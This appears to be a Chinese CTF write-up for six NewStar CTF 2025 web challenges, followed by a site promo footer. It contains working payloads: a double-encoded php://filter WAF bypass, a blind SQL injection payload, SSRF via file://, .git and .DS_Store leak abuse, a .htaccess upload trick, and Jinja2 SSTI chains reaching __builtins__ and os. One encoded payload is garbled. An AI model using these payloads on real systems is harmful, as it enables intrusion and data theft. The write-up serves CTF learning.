NewStar CTF 2025 Web 赛道第三周题目涉及多种常见漏洞类型。ez-chain 通过双重编码和 rot13 绕过 WAF 读取 flag;白帽小 K 的故事(2)利用字符盲注配合二分法脚本进行 SQL 注入;mygo!!! 结合文件扫描与 file 协议读取敏感文件;小 E 的秘密计划通过备份文件及.git 泄露获取凭证,利用.DS_Store 发现隐藏路径;mirror_gate 利用.htaccess 配置将 webp 解析为 php 实现文件上传;who'ssti 针对 SSTI 漏洞构造 payload 触发内置函数获取 flag。涵盖 PHP 过滤、SQL 注入、信息泄露、文件上传及模板注入等知识点。
根据源码,分析需要绕过两层 WAF:首先需要传入 file 参数,传入的参数经过第一层 WAF,因为还未进行解码,所以可以通过双重编码绕过。另外一层 WAF 因为会将读取内容进行判断是否内容包含 f 字符,然后进行 base64 层层解码继续判断是否存在 f 字符,所以此处不能使用 base64 编码读取内容,可以使用 rot13 编码读取绕过。
原始 payload:
php://filter/read=string.rot13/resource=/flag
双重编码以后的 payload:
%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2572%2565%2561%2564%253d%2573%2574%2572%2569%256e%2567%252e%2572%256f%2574%2531%2533%252f%2572%2565%2573%256f%2575%%%%d%f%%c%%
浏览器传入 payload:
file=%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2572%2565%2561%2564%253d%2573%2574%2572%2569%256e%2567%252e%2572%256f%2574%2531%2533%252f%2572%2565%2573%256f%2575%2572%2563%2565%253d%252f%2566%256c%2561%2567
flag{2d6baf66-878b-4f14-952e-86fca723f7d5}
启动环境访问题目:
是一个查询接口:
经过基本的 SQL 注入 payload 测试发现空格是被过滤掉的。
界面提示,点开看了看:
确认为字符盲注,采用二分法脚本爆破数据库、表、字段,导出数据即可,空格使用 () 绕过即可。基本 payload:
payload = "amiya'^(ascii(substr((select(group_concat(flag))from(Flag.flag)),%d,1))<%d)^1#" % (i,mid)
爆破数据库:
表和列:
导出数据:
flag{4bff70f3-f336-489b-a4d5-d23d4e410f3b}
访问查看源码:
尝试扫描文件,发现 flag.php,直接访问:
https://eci-2ze783w94rticdke15eh.cloudeci1.ichunqiu.com:80/?proxy=http%3A%2F%2Flocalhost%2Fflag.php
接下来就一目了然了,直接构造 file 协议读取 flag 即可:
https://eci-2ze783w94rticdke15eh.cloudeci1.ichunqiu.com:80/?proxy=http%3A%2F%2Flocalhost%2Fflag.php?soyorin=file%3A%2F%2F%2F%2Fflag
flag{2dce6900-7056-494a-8bef-4fe13729ab65}
根据题目描述先找到网站备份文件:直接扫描发现是 www.zip
分析源码结构,发现目录和文件如下:
并且有登录页面,需要在 git 中找,那就使用 git 提取工具提取文件:
提取后的文件:
获取到用户名和密码
尝试登录
登录后提示 MacOS 痕迹,那就是.DS_Store
https://eci-2zed6yp2av3gey0zzusg.cloudeci1.ichunqiu.com:80/secret-1c84a90c-d114-4acd-b799-1bc5a2b7be50/.DS_Store
解析下载的文件:
看到 flag 应该在 ffffllllaaaagggg114514 中,去除空格访问该路径即可拿到 flag
flag{10d8488e-ca8a-4f27-a1dd-afa8cbed3121}
启动环境访问查看源码发现提示:
扫描 uploads 看看有啥,发现.htaccess
访问发现是将 webp 当做 php 解析,那就是常规文件上传套路了,上传一个 webp 文件,内容为包含 flag 文件即可,根据提示 flag 是在 flag.php,那就上传包含该文件即可
上传的时候发现 包含即可
发送请求:
然后访问上传的文件即可拿到 flag
flag{376e54c4-6dce-49aa-ae2f-67c14122bdf7}
下载附件查看代码:
会随机选择五个函数要求你触发调用,触发调用完成之后就会给你 flag,常规 SSTI 调用,发送以下 payload 就会分别触发对应的函数,根据你的环境分别发送即可
{{config}} {{ config.__class__.__init__.__globals__.__builtins__.__import__('random').randint(1, 100) }} {{ config.__class__.__init__.__globals__.__builtins__.__import__('textwrap').dedent(' test\n ') }} {{ config.__class__.__init__.__globals__.__builtins__.__import__('difflib').get_close_matches('test', ['test', 'testing']) }} {{ config.__class__.__init__.__globals__.__builtins__.__import__('statistics').fmean([1, 2, 3, 4, 5]) }} {{ config.__class__.__init__.__globals__['__builtins__'].__import__('random').choice(['a','b','c']) }} {{ config.__class__.__init__.__globals__['__builtins__'].__import__('statistics').mean([1,2,3,4,5]) }} {{ lipsum.__globals__.os.listdir('.') }} {{ config.__class__.__init__.__globals__['__builtins__'].__import__('re').search('test', 'test string') }} {{ config.__class__.__init__.__globals__['__builtins__'].__import__('re').findall('t', 'test') }} {{ config.__class__.__init__.__globals__['__builtins__'].__import__('pickle').loads.__name__ }} {{ config.__class__.__init__.__globals__['__builtins__'].__import__('numpy').sum([1,2,3,4,5]) }}
依次发送即可
得到 flag
flag{305b3fc4-ca20-4a7b-8a9e-daa048240bd3}
微信公众号「极客日志V2」,在微信中扫描左侧二维码关注。展示文案:极客日志V2 zeeklog
使用加密算法(如AES、TripleDES、Rabbit或RC4)加密和解密文本明文。 在线工具,加密/解密文本在线工具,online
基于开源反向 Alpha 混合算法去除 Gemini/Nano Banana 图片水印,支持批量处理与下载。 在线工具,Gemini 图片去水印在线工具,online
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online